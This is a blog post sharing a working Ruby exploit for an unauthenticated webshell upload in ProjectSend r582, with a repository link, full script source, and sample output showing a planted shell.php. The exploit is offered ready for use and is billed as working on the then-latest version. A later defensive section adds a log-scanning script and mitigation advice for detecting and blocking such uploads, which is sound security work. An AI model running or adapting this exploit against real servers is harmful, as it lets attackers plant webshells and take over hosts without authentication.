[WEB HACKING] ProjectSend R582 WebShell Vulnerability (Exploit) [ZERODAY?]

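While recently analyzing a framework called ProjectSend, I found a vulnerability that allows a webshell to be uploaded and submitted it to Exploit-DB, but it turned out to be a vulnerability that had already been posted =_= .. I was so pleased that I wrote the script and sent it off right away, and never thought to look it up first..

Still, it is simple to use since it is written in Ruby, so I am sharing it through the blog.

It is a zero-day that works even on r582, the current latest version.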

GIT Repo

https://github.com/hahwul/ProjectSend_r582_webshell.git

git clone https://github.com/hahwul/ProjectSend_r582_webshell.git

Source Code

ProjectSend_r582_webshell.rb

    # --------------------------------------------------------------------
    # Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
    # Date: 2015-07-01
    # Exploit Author: hahwul
    # Blog: http://www.codeblack.net
    # Vendor Homepage: http://www.projectsend.org
    # Software Link: http://www.projectsend.org/download/108/
    # Version: ProjectSend-r582
    # Tested on: debian [wheezy]
    # CVE : none
    # --------------------------------------------------------------------

    require "net/http"
    require "uri"
    require "net/http/post/multipart"

    if ARGV.length != 2
      puts "ProjectSend r582ver Webshell Upload"
      puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
      puts " targetURL(ex): http://127.0.0.1/vul_test/ps"
      puts " ShellFile(ex): MyShell.php"
      puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
      puts " Include Gem : gem install multipart-post"
      puts " exploit & code by hahwul[www.codeblack.net]"
    else
      target_url = ARGV[0] # http://127.0.0.1/ps/
      shell_name = ARGV[1] # myshell.php
      exp_url = target_url + "/process-upload.php"

      uri = URI.parse(exp_url)
      http = Net::HTTP.new(uri.host, uri.port)

      # Multipart body: the file part plus a "name" field, sent without any session
      multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
      multipartParams = multipartParams.merge({"name"=>"shell.php"})
      request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
      request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      request["Cache-Control"] = "no-cache"
      request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
      request["Connection"] = "keep-alive"
      request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
      request["Accept-Encoding"] = "gzip, deflate"
      request["Pragma"] = "no-cache"
      response = http.request(request)

      puts "Target: "+uri.host+uri.path
      puts "Exploit..."
      puts "Status code: "+response.code
      puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name
    end

Execute & Result

ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php

    Target: 127.0.0.1/vul_test/ps/process-upload.php
    Exploit...
    Status code: 302
    Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php

Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php

    WEBSHELL UPLOAD
    total 12
    drwxrwxrwx 2 hahwul   hahwul   4096 Jul 1 01:21 .
    drwxrwxrwx 4 hahwul   hahwul   4096 Jul 1 01:11 ..
    -rw-r--r-- 1 www-data www-data   66 Jul 1 01:21 shell.php
    -rw-r--r-- 1 www-data www-data   66 Jul 1 01:21 shell.php
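On the defending side, the request pattern shown above leaves a trace in the web access log: a POST to process-upload.php, then a request for a script file under upload/files/. The following Ruby is an added example, not part of the original post or of ProjectSend; it assumes the Apache/nginx "combined" log format, and the log lines and the function name are constructed for illustration.

```ruby
# Added example (not from the original post): flag script files served from the
# upload directory and correlate them with earlier POSTs to the upload endpoint.
LOG_RE = %r{\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) }
UPLOAD_ENDPOINT = %r{/process-upload\.php(?:\?|\z)}
# Script-like extensions that should never be served from a user upload directory.
SCRIPT_IN_UPLOADS = %r{/upload/files/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|\z)}i

def find_upload_webshell_activity(lines)
  posts = Hash.new { |h, k| h[k] = [] } # client IP => timestamps of upload POSTs
  findings = []
  lines.each do |line|
    m = LOG_RE.match(line) or next      # skip lines that are not in combined format
    if m[:method] == "POST" && m[:path] =~ UPLOAD_ENDPOINT
      posts[m[:ip]] << m[:ts]
    elsif m[:path] =~ SCRIPT_IN_UPLOADS
      served = m[:status].start_with?("2")
      # :high   = script served (2xx) to a client that posted to the endpoint earlier
      # :medium = script served, no upload POST seen from that client in this log
      # :low    = request was refused or the file was missing (probe)
      severity = served ? (posts.key?(m[:ip]) ? :high : :medium) : :low
      findings << { ip: m[:ip], time: m[:ts], path: m[:path],
                    status: m[:status].to_i, severity: severity }
    end
  end
  findings
end

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = <<~LOG.lines.map(&:chomp)
  192.0.2.10 - - [01/Jul/2015:01:20:11 +0900] "GET /vul_test/ps/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.7 - - [01/Jul/2015:01:21:03 +0900] "POST /vul_test/ps/process-upload.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
  198.51.100.7 - - [01/Jul/2015:01:21:09 +0900] "GET /vul_test/ps/upload/files/shell.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
  192.0.2.10 - - [01/Jul/2015:01:22:40 +0900] "GET /vul_test/ps/upload/files/report.pdf HTTP/1.1" 200 90311 "-" "Mozilla/5.0"
  192.0.2.33 - - [01/Jul/2015:01:25:02 +0900] "GET /vul_test/ps/upload/files/test.php HTTP/1.1" 404 210 "-" "curl/7.26.0"
LOG

if __FILE__ == $PROGRAM_NAME
  find_upload_webshell_activity(SAMPLE_LOG).each do |f|
    puts "#{f[:severity].to_s.upcase} #{f[:time]} #{f[:ip]} #{f[:path]} (#{f[:status]})"
  end
end
```

Any 2xx response for a .php file under upload/files/ means the upload directory is executing scripts, so the matching server-side control is to disable script handling for that directory and to require an authenticated session on the upload endpoint.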

Licensed under CC BY-NC-SA 4.0
Last updated on Jul 10, 2021 01:05 +0900